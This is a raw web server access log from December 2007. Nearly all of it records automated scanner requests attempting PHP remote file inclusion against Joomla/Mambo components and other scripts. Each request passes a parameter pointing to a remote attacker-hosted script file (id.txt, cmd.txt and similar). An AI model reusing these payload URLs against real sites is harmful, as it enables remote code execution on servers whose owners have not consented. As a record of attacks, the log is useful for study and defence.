65.98.114.26 - - [16/Dec/2007:16:05:46 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.114.26 - - [16/Dec/2007:16:05:48 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.98.114.26 - - [16/Dec/2007:16:05:49 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.98.114.26 - - [16/Dec/2007:16:06:07 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.67.210.218 - - [16/Dec/2007:16:06:09 -0800] "GET /index.php?pagina=http://www.lolzz.kit.net/scan/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.98.114.26 - - [16/Dec/2007:16:06:14 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.114.81.173 - - [16/Dec/2007:16:06:14 -0800] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/31.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
65.98.114.26 - - [16/Dec/2007:16:06:14 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.114.81.173 - - [16/Dec/2007:16:06:14 -0800] "GET ///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/31.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
65.98.114.26 - - [16/Dec/2007:16:06:15 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.165.125.228 - - [16/Dec/2007:16:06:17 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.165.125.228 - - [16/Dec/2007:16:06:17 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.192.58 - - [16/Dec/2007:16:06:18 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:18 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:19 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:22 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.193.192.58 - - [16/Dec/2007:16:06:23 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:23 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:30 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:31 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.98.114.26 - - [16/Dec/2007:16:06:35 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:06:41 -0800] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:06:41 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:06:41 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:06:42 -0800] "GET /logs/access_071029.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:42 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:43 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:43 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
207.114.81.173 - - [16/Dec/2007:16:06:47 -0800] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
207.114.81.173 - - [16/Dec/2007:16:06:48 -0800] "GET ///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:06:56 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.72.42 - - [16/Dec/2007:16:07:04 -0800] "GET /logs/access_070723.log/index.php?pagina=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.72.42 - - [16/Dec/2007:16:07:04 -0800] "GET /logs/index.php?pagina=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.253.138.11 - - [16/Dec/2007:16:07:04 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://northsidepoker.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.253.138.11 - - [16/Dec/2007:16:07:05 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://northsidepoker.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.172.49.109 - - [16/Dec/2007:16:07:18 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.49.109 - - [16/Dec/2007:16:07:18 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.26.153.204 - - [16/Dec/2007:16:08:27 -0800] "GET /logs/access_071105.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.26.153.204 - - [16/Dec/2007:16:08:27 -0800] "GET /logs/access_071105.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.26.153.204 - - [16/Dec/2007:16:08:27 -0800] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.26.153.204 - - [16/Dec/2007:16:08:27 -0800] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.26.153.204 - - [16/Dec/2007:16:08:28 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.26.153.204 - - [16/Dec/2007:16:08:28 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.26.153.204 - - [16/Dec/2007:16:08:28 -0800] "GET /logs/access_071029.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.26.153.204 - - [16/Dec/2007:16:08:28 -0800] "GET /logs/access_071029.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:08:31 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:08:31 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:08:32 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:39 -0800] "GET /logs/access_071105.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.101.4.49 - - [16/Dec/2007:16:08:39 -0800] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:39 -0800] "GET /logs/access_071105.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:39 -0800] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.101.4.49 - - [16/Dec/2007:16:08:39 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:39 -0800] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:39 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.101.4.49 - - [16/Dec/2007:16:08:39 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:40 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:40 -0800] "GET /logs/access_071029.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:40 -0800] "GET /logs/access_071029.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:08:42 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:08:48 -0800] "GET /logs/access_071203.log/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:08:49 -0800] "GET /send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:08:49 -0800] "GET /logs/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
87.238.198.71 - - [16/Dec/2007:16:08:53 -0800] "GET /logs/access_071105.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.198.71 - - [16/Dec/2007:16:08:53 -0800] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:53 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:08:53 -0800] "GET /logs/access_071029.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:08:59 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:09:00 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:09:01 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:09:04 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:09:07 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.193.192.58 - - [16/Dec/2007:16:09:07 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:09:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.55.212.145 - - [16/Dec/2007:16:09:11 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:09:11 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:09:13 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:09:13 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:09:13 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:09:15 -0800] "GET /logs/access_071022.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.198.71 - - [16/Dec/2007:16:09:16 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:09:16 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.212.145 - - [16/Dec/2007:16:09:22 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 7504491 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.208.13.34 - - [16/Dec/2007:16:09:28 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.freewebs.com/back1337/xx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.208.13.34 - - [16/Dec/2007:16:09:29 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.freewebs.com/back1337/xx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.208.13.34 - - [16/Dec/2007:16:09:29 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.freewebs.com/back1337/xx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
87.238.198.71 - - [16/Dec/2007:16:09:30 -0800] "GET /logs/access_071022.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:09:31 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.198.71 - - [16/Dec/2007:16:09:31 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.98.114.26 - - [16/Dec/2007:16:09:37 -0800] "GET /logs/access_071105.log//classes/adodbt/sql.php?classes_dir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.114.26 - - [16/Dec/2007:16:09:38 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.98.114.26 - - [16/Dec/2007:16:09:39 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:09:51 -0800] "GET /logs/access_071022.log///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:09:52 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:09:52 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:09:53 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.72.42 - - [16/Dec/2007:16:10:08 -0800] "GET /logs/access_070806.log/index.php?pagina=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:21 -0800] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:22 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:22 -0800] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:22 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:22 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:22 -0800] "GET /logs/access_071029.log//components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:23 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.153.63 - - [16/Dec/2007:16:10:23 -0800] "GET /logs/access_071029.log//components/com_cpg/cpg.php?mosConfig_absolute_path=www.myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.101.4.49 - - [16/Dec/2007:16:10:41 -0800] "GET /logs/access_070618.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
136.145.43.10 - - [16/Dec/2007:16:11:17 -0800] "GET /logs/access_071119.log/send_reminders.php?includedir=http://myspacebill.com/myspacebill/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.35.191.104 - - [16/Dec/2007:16:11:27 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://northsidepoker.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.104 - - [16/Dec/2007:16:11:27 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://northsidepoker.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.30.216.90 - - [16/Dec/2007:16:11:31 -0800] "GET /logs/access_070730.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.111.173.115 - - [16/Dec/2007:16:11:43 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://northsidepoker.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [16/Dec/2007:16:11:44 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://northsidepoker.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:11:50 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
213.178.2.45 - - [16/Dec/2007:16:11:50 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:11:54 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:11:55 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
